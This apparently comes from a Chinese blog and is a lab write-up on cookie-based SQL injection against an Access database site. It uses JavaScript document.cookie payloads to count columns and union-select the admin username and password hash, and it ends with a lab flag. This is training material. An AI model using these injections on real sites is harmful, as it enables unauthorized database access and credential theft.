Acess注入—Cookie注入

Acess注入—Cookie注入

靶场地址
原理:php中的$_REQUEST[] 可以获取POST|GET|COOKIE传参,可以通过burp的抓包,修改cookie的参数,也可以通过控制台,利用JS来进行cookie注入

第一题:

我们进去靶场随便点一个链接,进入具有id传参的界面。
在这里插入图片描述我们先尝试,是否能进行GET传参进行显错注入
加粗样式
发现被禁止了,于是我们尝试cookie注入
打开burp抓包
在这里插入图片描述去掉上面的id=171,在cookie后面加;闭合,再输入id=171,看看语句是是否执行
在这里插入图片描述然后放包,发现上面没有id传参,但是页面返回正常
在这里插入图片描述代表,我输入的语句成功实行了,于是在控制台,利用JS判断字段数

document.cookie="id="+escape("171 order by 1")

在这里插入图片描述页面正常,我们继续增大,到11

document.cookie="id="+escape("171 order by 11")

在这里插入图片描述出错,我们输入10

document.cookie="id="+escape("171 order by 10")

在这里插入图片描述页面正常,于是我们判定存在10个字段,继续输入JS语句

document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述因为access数据库,只有一个库名,所以需要写from admin ,找到数据库的输出位2,3,7,8,9
判断表名,我们可以用猜的方法,手动爆破
在这里插入图片描述但是对于新手来说,更适合用burp爆破,于是我们抓包
在这里插入图片描述抓到数据包,找到可能的表名
在这里插入图片描述很多表名,但是一般在盛行Access数据库的年代,都在admin表的username和password字段
所以我们直接输入

document.cookie="id="+escape("171 union select 1,username,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述找到账号admin
继续输入

document.cookie="id="+escape("171 union select 1,password,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述找到密码
b9a2a2b5dffb918c
在后台登陆
在这里插入图片描述但是密码错误

在这里插入图片描述进行密码md5解密
在这里插入图片描述在这里插入图片描述拿到flag:zkz{welcome-control}

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值